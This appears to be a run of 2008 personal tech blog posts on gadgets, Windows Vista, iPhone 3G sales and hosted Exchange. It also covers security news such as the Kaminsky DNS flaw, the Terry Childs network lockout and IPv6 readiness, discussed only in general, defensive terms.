Now, let me tell you right up front that when it comes time to "install" the shield on your phone, you'll need a clean work surface, a little patience, 12 to 24 hours to let your shield "cure" on the phone,  and the ability to read and follow some simple instructions. If you make sure you have those few key things taken care of, all will go well.

In the video below I show and abuse my iPhone 3G (the only one I own...) with an Invisible Shield installed. In the video you can see that there are a couple scratches under the shield. Those came from a combination of iPhone and the keys in my pocket (before I ordered the invisibleSHIELD . In fact it was those exact scratches, which I got the first day I had the phone, that prompted me to find a real, working anti-scratching solution.



I can highly recommend the Invisible Shield.

Full disclosure: Zagg (the manufacturer of the invisibleSHIELD ) doesn't know I am doing this review. I found their product all on my own based on a real need, and clicking on the advertisement below takes you to my link on their product site - If you buy something there I'll get a small chunk of the change you spend. If you don't like that idea, no problem - just go to zagg.com and click through to the iPhone 3G page (or whatever product you want to cover and protect - For me, my MacBook Air is next).

  

I especially appreciated the Mojave Experiment that Microsoft recently shared with the world (where Vista-negative opinions were tested with a "new" version of Windows, code-named Mojave; it was then revealed to the participants after seeing the new version that what they were looking at was actually Vista). I've been using Vista since well before I came onto the market, and I can hardly stand to use WIndows XP computers anymore. Anyhow, check out http://www.mojaveexperiment.com if you haven't seen it, especially if you have a negative opinion of Vista today based on what you've heard from others. (Note: Scientifically speaking, the "experiment" would be badly flawed, but it's a marketing campaign and in that light it's pretty darned smart if you ask me. Plus, I've lost track of how may people who, never having seen Vista yet having a negative perception, decided to upgrade after trying for a couple hours (on my laptop) at my suggestion. With SP1 installed, for the record. Seriously, group think and manipulation goes both directions).

For those of us who are using Vista (or any other OS for that matter), it's nice to be able to fine-tune a computer system so it will perform the way we want it to. For Vista, Microsoft has released a document called Windows Vista Performance and Tuning as part of their Springboard series, which lets users know about a number of tweaks and decisions they can make to make the OS work well for their needs. It also effectively spells out in fairly plain language some relatively complex information.

Windows Vista and SP1 focus on delivering greater performance and overall system responsiveness. By striking a balance between speed and responsiveness, Windows Vista and SP1 deliver a level of performance that has the greatest positive impact on the system’s usability.This guide looks at the following areas of performance improvement:

• Making configuration changes that help a computer feel more responsive when you use it.
• Using hardware to boost the actual physical speed of a computer.
• Making configuration changes that help a computer to start faster.
• Making the computer more reliable may help increase performance.
• Monitoring performance occasionally so that you can stop problems before they get too big.

There are a variety of other guides out there as well, but this one hits a number of important nails on the head that the average computer user can easily understand and use.

Last week we published an interview that Richard and I did on RunAs Radio with my friend and former co-worker, Simon Goldstein. Simon's a real pro and is good at explaining complicated business relationships and processes.

We cover risk management for IT professionals: What is it, what do you need to know, and why does it matter? As with all of our weekly RunAs Radio shows, it's about 30 minutes long and we cover a lot of ground in that time.

RunAs Radio, Show 67 - Simon Goldstein on IT Risk Management (38 minutes)

Note: You can find all our podcast feeds in the table here, and you can also subscribe to get the show every week in iTunes by clicking here.

Over on the Internet Evolution site I recently wrote an article discussing the fact that MySpace is becoming an OpenID provider. Of note is the fact that they will be provider-only, and not a relying party, at least initially. This is a trend we've seen with other big companies like Yahoo!, and many of us are not-too-patiently waiting for these companies to start trusting and relying upon other organizations, so the utopia of user-controlled Internet single-sign-on can become a reality.

That begs the question, "What will it take to achieve the level of trust and confidence needed to make it easy for these big provider companies to join the relying-party crowd?" I'm certain there are plenty of detailed conversations and that things are being hammered out and actively discussed behind the scenes at all these major companies, but I tend to think about these things out loud anyhow.

So, I hope you'll read my article and thoughts over on Internet Evolution and that you'll take advantage of the opportunity to comment there. I'd be interested to know what you think.

The DNS vulnerability discovered earlier this year by Dan Kaminsky, and recently patched by DNS software providers in an unprecedented cross-vendor cooperation, has graduated from vulnerability to exploit-in-the-wild.

According to Kaminsky, 52% of the DNS servers on the Internet are still vulnerable, better than the number of exploitable systems just a few weeks ago when the patches were released by all the vendors.

Kaminsky has written up a plain-language helper guide to explain the problem to non-technical (read: management and decision-making) people. There's also a Black Hat webcast with Kaminsky available where he details the vulnerability and discusses the fixes.

Read more at Ars Technica.

On the Google blog, Jesse Alpert & Nissan Hajaj posted an article today called "We knew the web was big..." which indicates Google engineers recently noted that the number of web pages on the Internet passed the one-trillion mark. That's 1,000,000,000,000 pages. For those who don't process the impact of adding that many groups of zeros at a time, think about this:

• Take 1,000 pages.
• Multiply that 1,000 times and think about just how big that is.
• Multiply that amount another thousand times, and stop to think about how big that is.
• Now, again take that huge amount and multiply it by 1,000. Now you're at a trillion pages.

That's freakin' huge, really. If you started counting from one to a trillion and counted one number per second, it would take you almost 317 centuries before you were done (and by the way I asked google to help me figure that out). That's almost 32,000 years. It almost completely boggles the mind. That's a lot of web pages.

Google also notes that every day, the number of pages on the web increases by several billion.

Alpert and Hajaj have another explanation to try to explain the sheer size of the Internet today:

Today, Google downloads the web continuously, collecting updated page information and re-processing the entire web-link graph several times per day. This graph of one trillion URLs is similar to a map made up of one trillion intersections. So multiple times every day, we do the computational equivalent of fully exploring every intersection of every road in the United States. Except it'd be a map about 50,000 times as big as the U.S., with 50,000 times as many roads and intersections.

That's really just amazing to me. Wow. And now you know why we call this the Information Age. A lot of that information may be inaccurate, pornographic or otherwise useless, but some of it's good, and the sheer immensity of it is truly awesome.

TechCrunch has a slightly different take, calling the Google post misleading. The end of the TechCrunch post alludes to some news coming next week that might turn Internet indexing on it's head. Interesting - Is there some big search engine news in the works? Is it Microsoft's BrowseRank or something else? Stay tuned.

Dunno about twice as fast, but will it blend? Blendtec (of course) decided to find out. Found via the Google Mobile blog.

Over at OSCON just a short time ago, the Open Web Foundation was just announced. Eran Hammer-Lahav just blogged about it at the OWF site. This is great news, and should go a long way to enabling better community development of standards and specs in a non-proprietary fashion.

This morning at OSCON, David Recordon announced the creation of the Open Web Foundation. The Open Web Foundation is an attempt to create a home for community-driven specifications. Following the open source model similar to the Apache Software Foundation, the foundation is aimed at building a lightweight framework to help communities deal with the legal requirements necessary to create successful and widely adopted specification.

The presentation slides are also available in Eran's post.

What would Steve click?

It's not often you find advertising that doesn't just bother you. I try to keep the ads on this site relevant, minimalist and out of the way. But on a limited-size device like the iPhone, not to mention it's a device that has that "cool usability" vibe, the need for ultra-careful advertising design is critical. Acceptance is important.

Enter AdMob. They've created advertising blocks for the iPhone that are - well - pretty darn cool. Hopefully the advertisements that show up in them in practice will be relevant and cool, too. Check out the video.

First, a big congrats to the guys at jkOnTheRun for their acquisition by GigaOm and their continued full-time blogging careers. Great people, and a great deal.

Kevin at jkOnTheRun posted a preview article the other day that I somehow missed until now, describing the Microsoft Live Mesh client for the Mac. It's not available yet, but Kevin was able to try it out. Previously he'd reviewed the mobile client for Live Mesh.

I've been using Live Mesh for a few months now in a limited fashion because only one of my computers at home will work (meaning only one runs a Windows desktop OS). My other machines are a Home Server and Mac, and my mobile decide is an iPhone. But I like what I have seen in the Mesh system, including the UI. So, I am looking forward to the release of a Mac client.

Check out Kevin's preview of the pre-release Mac app here.

In the case of Terry Childs, a network admin who gained notoriety recently for locking the City of San Francisco and his managers out of their own critical network, comic-book style progress has been made, with Childs' attorney inviting the mayor of SF to a secret meeting at the jail, where Childs handed over the passwords he'd previously refused to disclose.

Childs' lawyer, again in typical comic book fashion, has also come out saying that Childs' actions were essentially noble and that he was acting to protect the network he built from his management and peers, whom he characterized as being neglectful and without the proper knowledge to support the network. About what you'd expect from a defense lawyer in a public case, I suppose.

But Childs is in no way a hero. Even if what he says is completely true, he's (allegedly) committed a real crime. He does not own that network even if he helped build it, and regardless of whether the management in his department was capable of exercising its responsibilities, when Childs locked everyone out he crossed a clear line. If it was to make a point, he simply went overboard. The whole unfortunate case just smacks of ego and manic behavior.

But from arm's length the city doesn't exactly look like a helpless victim, either. Any professional management team that creates an environment where one person can control a critical and sensitive network in the manner exercised in this case has missed some of the most crucial and common-sense aspects of IT and security design. In fact, most of the time when cases of one-man-too-much-power crop up, we find that the IT staff is also responsible for security with little or no separation of duties, no checks and balances, and no controls to ensure one bad apple doesn't ruin the whole barrel.

Was Childs right? Absolutely not. Was the City wrong? I don't see how you can argue otherwise.

You'd likely be surprised how many real-world computer networks - big and small, important and less so - are run on the concept of "we just trust that one guy." It's what we call a "Beer Truck" risk problem: If I'm that guy you trust, what if I get hit by a beer truck and killed, or alternatively what if I drink everything on that beer truck and go nuts and wipe out the network? What then?

Systems should be set up to ensure no one person holds all the keys. Over the past few days I've read comments made about this story, in many cases by angry IT-types who say if you hire someone you have to give them access to everything and you have to trust them to do the right thing. Otherwise they cannot do their job, you're a terrible person and your network and systems are doomed. That premise is simply and blatantly false, and in fact following that method puts you in the same boat the City of San Francisco has just found itself in. Please, don't listen to the old-skool IT admin crowd, telling you to hand it all over to them because you obviously don't know what you're doing. Fire those guys and find some real help.

If you want a healthier view of the situation, check out articles written by smart, thoughtful people, like this one by Paul Doyle. Also, Paul Venezia wrote an in-depth article about what went wrong, with some detailed inside information.

To be clear, no one person should control all the systems. Control and authority are not the same thing. Checks and balances are important. The Air Force doesn't allow one person to perform all the steps needed to launch a ballistic missile, right? Apply the same principles to your IT systems.

Case in point: I was the chief security executive at a major online financial services company. I had administrative access to nothing. I couldn't even get in the data center without an escort and records being kept. I had no account access to critical or sensitive systems. And no one person there could make changes in a vacuum. IT workers didn't have access to security systems. Security workers didn't have administrative access to anything by default. And we operated effectively, smoothly, with full knowledge of what was happening on the network and systems. No one person had control. Authority, sure. But actual control of systems? No. To operate otherwise would have been negligent.

I often preach the value of formalizing security management and putting proper process, technology and organization in place to ensure a good, stable system that can effectively support business. One of the pillars of an effective security management system is hiring good people (probably not ones who have been convicted of aggravated robbery in the past, sorry) and separating duties in a way that protects everyone involved - employees included. Doing so is not punishment, it's just good common sense.

If nothing else, lets hope businesses and governments all over learn from this embarrassing public spectacle. There are standards out there (my background and experience is in ISO 27001, an international security management standard), the very purpose of which is to make sure things like this don't happen. It's high time to start using them.

DNS has a hole in it. Bad guys are working on exploits right now. Patches are available right now. Anyone responsible for a DNS server needs to exercise that responsibility. Right Now.

Dan Kaminsky found a security hole in DNS recently, the details of which he was keeping quiet so providers could fix and release patches and DNS server owners could get those patches deployed, in order to avoid security breaches on the Internet. His intent was to release the gory details in a couple weeks at the Black Hat conference.

But the other day word of the details inadvertently leaked out, and so now everyone responsible for a DNS system must - and I do mean must - drop what they're doing and make sure their systems are patched and safe. Failure to do so puts Internet users at risk of site fraud and hijacking.

DNS is a system that translates names you can remember (like www.greghughes.net) to especially non-memorable numerical addresses the Internet can route (such as 208.109.238.146). It's the Internet's phone book, so to speak.

The security hole allows malicious people to spoof a web site using the actual, legitimate domain name. In other words, bad guys could hijack a DNS server, and if it happens to be one your computer relys upon, you could type in a legitimate address like www.google.com or www.yourbank.com, but the web page would be a malicious one - a fake. The recently-released patches plug the hole and prevent this misuse (although it doesn't really change the underlying protocol).

Aaron Massey wrote a very good post describing the issue and it's various details. He also links to Halvar Flake, a talented reverse-engineering guy who thought the threat through and pretty much guessed it right on his blog. After Halvar's guess, another security blog that had specific knowledge of the threat details confirmed Flake's hypothesis. As a result, the threat was disclosed.

Luckily, the various creators of the DNS systems used all over the Internet released patches about two weeks ago. The real question is, have you patched your servers? This is a critical flaw - it needs to be patched immediately.

If you want to know whether the DNS server your computer relies upon is vulnerable or not, you can use the DNS Checker in the sidebar of Kaminsky's blog (as long as it remains there).

A couple weeks ago I mentioned the release of Identi.ca, a social networking/microblogging site built on an open platform and allowing federation. Today, a beta release of Twhirl, one of the more popular clients used on the Twitter microblogging service as well as a couple others, adds support for Identi.ca and includes "push" support. Many of us who have come to like Indenti.ca are very happy.

That means Twhirl doesn't have to pole (read: overwhelm) the Identi.ca servers to see if you have any new items to read. Instead the servers just let you client know there's new content and pass it along. It works using the jabber/instant messaging interface (identi.ca sends it's push messages to your jabber account, and you tell Twhirl how to log into your IM account).

This is pretty darned smart (and takes a couple steps to set up). It's something that Twitter could probably use on their service to potentially reduce load (although I cannot say for sure that a push service would actually reduce the issues related to overloading of their servers).

Read more about it at CNET or grab the latest beta of Twhirl with Identi.ca support from this link.

Chances are, if you're reading this around the time I am writing it, that your computer is not exposed to an IPv6 network. You're most likely on an IPv4 (classic) network. You can easily tell by trying the quick IPv6 test on this page.

Even if you're not on the new network stack yet, change is happening, and systems have to be adapted to make sure not only that the new network works (most - but not all - modern hardware and software "understands" IPv6), but also that when you do actually start to operate in an IPv6 world, that you are properly secured.

In an effective security world, you need to put protections in place soon enough, meaning before the threat appears. You have to protect proactively, without waiting for bad guys to exploit a network or system. In the case of the IPv4 to IPv6 transition, that means making sure things like intrusion prevention and detection systems, firewalls, and other software and devices that function in the network layer even know how to "talk" the IPv6 language.

A number of current security applications just don't know how, so now is the time for a call to action: IPv6-enable your technology right now, to prevent opportune threats in the future. Don't get caught with your pants down.

Kim Zetter wrote a good article on the subject the other day at WIred. "The Ghost in Your Machine: IPv6 Gateway to Hackers" outlines quite well the potential threat imposed by a lack of readiness from a security perspective. It's not all bleak and terrible news, but as the article makes clear, now is the time to fix the problem, before something bad happens.

Probably the most difficult aspect of understanding the potential issues introduced by an environment not ready for IPv6 is the lack of awareness among IT folk in general as to how IPv6 works, how it's used, and the services (quite good ones, I might add - take a look at how IPsec is baked right in, for example) integral to the protocol.

What's it take to get from here to there? Being prepared with real, solid and accurate information is probably the most important step. Not many of us are naturally wired to take action before something bad happens. As an IT guy, I can tell you this: In the real world, most IT people don't learn what they need to know until after they need to know it. A lazy learning methodology just won't work in this case.

For IT professionals, do not assume that just because you were able to pick up your IPv4 knowledge over a long weekend of studying and tinkering that you'll be able to do the same with IPv6 - That's just not the case. IPv6 is more complex and has a lot more parts to understand. If you haven't learned it by now, for shame. Some of you have a little time left. Get on the ball, and gain the deep understanding you need to do your job properly.

For application and hardware vendors that haven't yet dealt with the IPv6 change, you're running late. While many vendors of firewall software, switched, home routers, etc. have made the proper changes, there are also many that have not. Even worse, there are a variety of IPv4-to-IPv6 workarounds that can relatively easily be put in place by unknowing people (read: the IT guys mentioned above) that circumvent firewalls and other protections that are relied upon for good security. Bad design, convenient at the time, disaster waiting to happen. Prevent this.

If you're an individual computer user or owner, what is the status of your software vendors with regard to dealing with IPv6 network traffic? Are you running the latest firewall software, current router firmware? Do the latest versions protect you in an IPv6 world?

IPv6 is a great move, and in time it will dramatically change for the better how computers and devices interact. That is, if we don't manage to screw it all up in the process.

Now is the time. IPv6 is here, Go forth. Learn, analyze and secure.

Several years ago I remember when my boss at the time, Chris Brooks, and others at work set up and ran Terrarium, a .NET v1.0 app that allowed peer-to-peer networking of machines running code with "bugs" (not the defect kind) in a virtual environment. It was a sort of a survival-of-the-fittest-bug kind of game, and they used it at work to build some fun learning into the process.

Fast-forward a few years, and the team at Microsoft that originally built the Terrarium app has scattered to the wind. But Bill Simser, a solutions architect, avid .NET guy and Microsoft MVP for SharePoint, took the initiative to find the code inside Microsoft, update it to .NET v2.0, and released it on CodePlex for the community to use and help maintain.

It's now a client-server application and has a worldwide-participation capability (as well as single-machine and closed local peering capabilities). Pretty cool stuff.

If you're an individual, team or group that wants to get some practice or learn more about programming in .NET and you want to have some fun in the process, check out Terrarium v2.

Resources:

• Bill Simser's blog post about Terrarium v2
• Terrarium v2 on CodePlex

There's some great news out of the Microsoft Xbox crew at the E3 conference - NetFlix integration with your XBox 360:

Microsoft revealed that beginning later this year, Netflix subscribers would gain access to the entire Netflix digital library through their online XBox 360's.  Gold membership is required to take advantage of this partnership, but the newfound capacity represents a large step forward in increasing the XBox 360's appeal as a living room media box.  The present Netflix digital library includes roughly 10,000 titles, and on the 360 will feature the ability for watching videos concurrently with friends over the Internet through the new community party system.

Xbox 360 will be the only game system that lets users instantly watch movies and TV episodes streamed from Netflix. Xbox LIVE Gold members who are also Netflix subscribers will be able to streaming movies and television show episodes from Netflix at no additional cost. I'm really looking forward to that. All we need now is a Blu-Ray drive for the 360 console...

Also announced was a revamped user experience and interface (implemented completely through software updates, and allowing more personalization and social interactivity), new HD programming partners and content (including Battlestar Galactica, which I am looking forward to), a price cut on the "Pro" model of the Xbox 360 and a new model slated for August, a future feature which will allow you to copy your game disk to the Xbox hard drive for faster loading and smoother play (you still need to have the original disc though), and a bunch of new games.

On TechCrunch IT, in a post called "The New Apple Walled Garden," author Nik Cubrilovic makes a good point...

TechCrunchIT » The New Apple Walled Garden

Geeks and enthusiasts wearing Wordpress t-shirts, using laptops covered in Data Portability, Microformats and RSS stickers lined up enthusiastically on Friday to purchase a device that is completely proprietary, controlled and wrapped in DRM. The irony was lost on some as they ran home, docked their new devices into a proprietary media player and downloaded closed source applications wrapped in DRM.

I am referring to the new iPhone - and the new Apple iPhone SDK that allows developers to build ‘native’ applications. The announcement was greeted with a web-wide standing ovation, especially from the developer community. The same community who demand all from Microsoft, feel gifted and special when Apple give them an inch of rope. When Microsoft introduced DRM into Media Player it was bad bad bad - and it wasn’t even mandatory, it simply allowed content owners a way to distribute and sell content from anywhere.

How can people who preach and pontificate open systems be so enamored with a completely closed, proprietary system as Apple's? Now, don't get me wrong. I was in line at an Apple store last week with all the people Nik talks about in his article. I really like the iPhone and I think my Mac is great, hardware-wise (okay, the OS is not too bad either). But there's something that's always lurking there in the back of my mind, like a pestering little voice that doesn't want me to give in or forget lessons of the past. "A closed system is a system doomed to fail," the voice tells me. Either that, or it is so limiting as to stifle. Or both. Maybe I need to get my medication checked. On the other hand, maybe the voice is right. Or both.

Risking cliche cynicism, I think one has to consider whether The Church of The Steve congregation is further developing (or devolving, if you prefer) in its adoration, at the expense of long-term good. Blind faith, crazed unthinking people saying one thing yet doing another, the how-dare-you-question mentality... Sounds familiar. And that's coming from an Episcopalian. An imperfect, sometimes-questioning, sometimes-doubting, cynical one -- But you get the point. I hope.

Perhaps the scariest part of my thought process today is that I actually agree completely with Dave Winer on this one. He nails it right on the head. Okay, there are times when I agree with Dave, but until now I've never really admitted it in public. :)

What do you think about Apple's model? Fanboy? Concerned? Who cares? End of the world as we know it? Utopia? Told-ya-so?

You can spend literally minutes (many of them) watching Gary Busey comment on various aspects of business and entrepreneurialism, and laughing in the process. Awesome. Highly recommended, since Gary is one of my favorites. You can click the buttons at the bottom of the video screen to get to different sections, each with several "episodes."

And by the way, the gotvmail service this video series is meant to virally market is pretty great, too. You might want to check that service out if you need a more-formal call-handling system for your smaller-sized business but don't want to shell out the money to buy all the classic PBX hardware. Great for distributed teams and virtual offices, too.

I know this isn't exactly a new thing, but as I was installing the IE8 Beta 1 for x64 architecture on a computer today to do some testing, I felt a warm-fuzzy sense of appreciation for the fact that more and more we are seeing software that checks for patches and updates before installing and running for the first time. It makes for more-secure system, which is nothing but good.

No matter what you think of Internet Explorer (and for the record/what it's worth, I like it quite a bit these days), you have to admit the safer installation process is a great improvement.

Gizmodo has a good article highlighting the analysis of the iPhone 3G's battery life (some loose methodology, and some only slightly more formal) by nine industry pundit sources. All I can add to the info is that it's good to burn the batteries in for a week with full charges and discharges (even in the modern battery world) before one can really experience accurate results (batteries tend to need a couple good cycles to provide optimum output).

The general consensus? No 3G phone on the market has great battery life, but in the grand scheme of suckiness, the iPhone 3G's battery life suck the least. Forgive the terminology, please. Just trying to make a point. :)

"One takeaway seems to be that as far as straight-up 3G talk time goes, the iPhone 3G is near the top of the range—Wirelessinfo and PC World both found it to be among the best 3G handsets they've tested for voice talk time. For mixed use and browsing numbers, the range is pretty wide, since the variables at play are nearly infinite."

I know a couple people who run so many programs at once on their laptops, they might just be able to take advantage of the new quad-core mobile processor from Intel, which is apparently coming next month. But I have to wonder - since those are the same people that will scream about battery life - how practical it would be. It will be interesting to see how they perform.

At any rate, looks like it's coming in August (and it ain't exactly cheap - see the story for more info).

"We're bringing quad-core to mobile in August," said Sujan Kamran, regional marketing manager for client platforms at Intel in Singapore. Kamran declined to disclose specifics of the quad-core chip, which will carry Intel's Core 2 Extreme moniker.

Link: Intel's Quad-core Mobile Chip Coming Next Month - Yahoo! News

Wow. The numbers are really huge. Apple has released figures for it's "opening weekend" box office smash, the iPhone 3G. One million units sold in the first three days. It took 74 days to sell that many of the original iPhone last year.

No wonder activation in the stores was so sluggish (or at times just broken). Big uptake in the USA, plus 20 other countries on opening weekend.

A quick note about analyst reports that preceded Apple's announcement. "There are three kinds of lies: lies, damned lies, and statistics." For the record, Piper Jaffray analyst Gene Munster said Monday that Apple was not going to meet even the half-million sales mark expectation set by the marketplace for the opening weekend. Boy, was he ever wrong.

In addition to the huge iPhone sales, Apple also announced that more than 10 million apps were downloaded from the iTunes App Store in the same time period. I wonder how many of those were paid for, how many were free, and what kind of revenue for Apple and authors we're talking about.

Very. Smart. Company. Not perfect, but that don't need to be. They take chances. Big ones. Laser-focused, too, and always successfully defining ahead of time what is "right" and then delivering (which, by the way, is much easier to do than letting someone else define "right" and then trying to meet those expectations).

This morning I signed up for a hosted Exchange Server 2007 account with the 4iphone.net service provided by 4smartphone.net, an early provider of push-iPhone service using the ActiveSync capabilities of Exchange. I'm up and running with my new iPhone on their Exchange server now with my own domain name, and I can tell you already I am just a couple steps away from migrating my email from Google Apps to 4smartphone.net.

To put it simply, Exchange Server 2007 rocks, and so does the new iPhone and its updated software. But when you put them together, you get the ol' 2+2=5 effect. The greater value of each piece of technology is truly realized when used in concert.

Note, too, that hosted Exchange customers get a free copy of Outlook 2007 (for the PC) or Entourage 2008 (for the Mac). There's no need to buy a copy. The client license is part of the hosted Exchange license. That alone is a substantial value.

Setup was fairly straightforward, although some of the configuration instructions were a little vague and complicated to decipher at first (see below). But as of now I'm receiving and able to send email on both my Google apps and Exchange mail servers - with no changes to my DNS settings required. So, it's super-easy to evaluate and try-out the Exchange hosting. Add the 15-day free trial (they'll reimburse if you decide not to keep the service running), and it's a zero-risk evaluation.

Note that when you set up the account at 4smartphone.net, you will initially be logged into their Account Manager, which is where you configure your domain(s) and users/mailboxes. In this interface, the information provided to set up your ActiveSync users is a little vague (specifically, the format of the user name is not intuitive). You can, however, find the complete details of what you need to configure your account when you log into their "Mailbox Manager" web app. In that interface, you'll navigate to Setup > ActiveSync > Instructions and there find exactly what you need.

Delivery with push technology on exchange reminds me of my Blackberry days - within seconds of arriving on the server, email hits the mobile device. Since I got my first iPhone I've always felt a little sluggish when it comes to receiving email. No more: The first time email arrived in Entourage on my Mac and on the iPhone at the same time - practically instantly - I realized what I've been missing.

Combined with the usability and terrific functionality of the 3G network and iPhone 2.0 software and it's just a little too much to describe. It just works, it works well, and it is usable to the point of not having to think about it -- the ultimate test for a usability engineer.

After setting up the email flow and making sure it all works, I used Entourage to copy all my contacts and calendar items to the Exchange server, then enabled syncing of that information from Exchange to the iPhone.

I'll post more after I've had a little more hands-on experience, but so far so great. Highly recommended, and with 4smartphone.net and companies like them, Exchange is available instantly to individuals and small groups or businesses, not just big companies.